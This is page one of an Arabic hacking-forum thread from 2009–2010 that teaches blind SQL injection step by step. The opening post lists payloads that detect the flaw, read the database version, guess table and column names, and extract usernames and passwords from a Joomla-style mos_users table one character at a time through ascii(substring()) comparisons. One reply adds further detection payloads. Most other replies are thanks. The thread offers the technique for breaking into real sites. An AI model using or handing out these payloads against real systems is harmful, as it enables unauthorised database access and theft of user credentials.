:: vBspiders Professional Network ::
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   ترتيب الخطوات للبلايد سكول (http://www.vbspiders.com/vb/t21709.html)

KaLa$nikoV 10-29-2009 08:36 PM
ترتيب الخطوات للبلايد سكول
 
ربنا يوفقني

volcano
بتعلم هكر البلايند
وان شاء الله ينجح بالتعليم

:)


اقتباس:
volcano


بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي

يلا نتابع


امر اكتشاف الخطأ

اقتباس:
'



2- امر التاكد من ان البلايند يعمل

اقتباس:
and (select 1)=1


3- امر معرفه اصدار القاعده

اقتباس:
and substring(@@version,1,1)=5

اقتباس:
and substring(@@version,1,1)=4

4- امر لمعرفه اسم الجدول نستعمل امر

اقتباس:
and (select 1 from table_name limit 0,1)=1

5-

امر لمعرفه اسم عامود اليوزر والباسوورد نستعمل هذا الامر


اقتباس:

and (select substring(concat(1,column_name),1,1) from table_name limit 0,1)=1

6- اليوزر نيم والباسورد بحقنه واحده

اقتباس:

and (select substring(concat(1,concat(username,0x3a,password)) ,1,1) from mos_users limit 0,1)=1

7-
اللعب مع تشفير
ascii
لاستخارج اليوزر والباسورد
فولكانو هكر تابع :)



اقتباس:
and ascii(substring((SELECT concat(username,0x3a,password) from mos_users limit 0,1),1,1))>1


هنا نزود باللعبه

على
اقتباس:
1,1))>1
سطر فولكانو الاحمر انتبه
-------------------volcano--------------------

اقتباس:
1,1))>2
اقتباس:
1,1))>3

وهكذا ليطلع لنا الخطا

ثم بعدها نلعب بنفس الطريقه لكن العد بكون هون

اقتباس:
2,1))>1

ونكمل بزياده على نفس الاسلوب
من عند سطر فولكانو الاحمر
السابق
لحتى يرجع لنا خطا
وهطذا

الان بس نخلص نجمع الارقام الي تطلع لنا

ونروح لهذا الموقع


لحتى نفك التشفير

بالتوفيق

ولا اخو 8898998
يسرق الموضوع لانه فهي اخطاء لسا ما خلصته
بس اخلصه بقلكم الطشوه يا 89088

MrXRoMaNcE1 10-29-2009 09:37 PM
يعطيك العافية

اضافة بسيطة لاكتشاف تغرة

كود PHP:
+and+1=
لا يحدث تغير لاكن عندما نضع

كود PHP:
+and+1=
يحدث تغير بصفحة لو بسيط او كبير او ممكن يظهر خطأ هكذا نعرف انها بلايند

وبالنسبة لمعرفة اصدار قاعدة

نضع

كود PHP:
AND SUBSTRING(@@version,1,1)=
اذا تغير محتوى صفحة يعني اصدار ليس 4

نجرب امر تالي

كود PHP:
AND SUBSTRING(@@version,1,1)=
اذا ما تغير هذا يعني انه الاصدار 5

ويعطيك العافية بانتظار جديدك يالغالي

KaLa$nikoV 10-29-2009 09:45 PM
يسلمو فايروس هكر ع الاضافه والتوضيح بارك الله فيك

actionman2007 12-25-2009 08:59 AM
الف الف شكر
الدرس بيساعد على تطبيق الثغره

Tr0j4n 01-08-2010 06:42 PM
مشكور فولكانو
مشكور

T3BaN_HaCkEr 01-12-2010 08:52 AM
يسلمو يا حجاج

اول مرة بسمع فيها

يلا معاكم نتعلم شوو علينا :)

ToRn4Do 01-12-2010 11:15 AM
يعطيكم العافية شباب مبدعين

مشكور يا فولكانو

اقبل مروري

M!M0 01-12-2010 03:53 PM
شـكــ وبارك الله فيك ـــرا لك

Dr.NaNo 02-08-2010 09:33 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مستر داتا بيز 05-13-2010 02:58 AM
يسلمو اخى فولكانو
بس لازم تعملنا درس فيديو
لان الحوار ده كده قالب دماغى

مش قادر افكر فيه
ياريت اخى اكرمك الله تعرفلنا ما هو هاكر البلايند والكلام ده

ضرووووووووووووووووووووورى

Prince-Of-Hacker 07-25-2010 05:10 PM
الف الف شكر
الدرس بيساعد على تطبيق الثغره

Prince-Of-Hacker 07-25-2010 05:13 PM
بس يا ليت تسوي شرح في الفيديو حبيبي بكون اسهل علينا تقبل مروري

DR.THMoORY 08-20-2010 02:52 PM
سهلت علينا والله يسلمو حبيبي

Dr.jmjmah 11-17-2010 07:11 AM
مشششكور والله يع‘ـطيك العافيه يـآمبـــــــــــدعَ

H3x HaCkeR 12-03-2010 01:08 AM
مشكور على الدرس الجميل
لكني عندي ملاحــظــة :D
الـ Blind SQL فرقها عن الـ SQL injection
شي بسيط الا وهو
الفرق الأساسي والوحيد بين هالنوعين ان الأول لا يظهر ناتج الاستعلامات.. والسبب برمجي لاغير << !!!!
في الثغرة التقليدية, سبب ظهور ارقام الاستغلال او الأعمدة وغيره هو وجود تعليمة print او echo في الكود لطباعة الأعمدة, في حال ماكانت موجودة فرح يظهرلك البلايند وقتها.
يعني لاتعتمد اعتماد كلي على علامــة '


الساعة الآن 12:08 PM
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0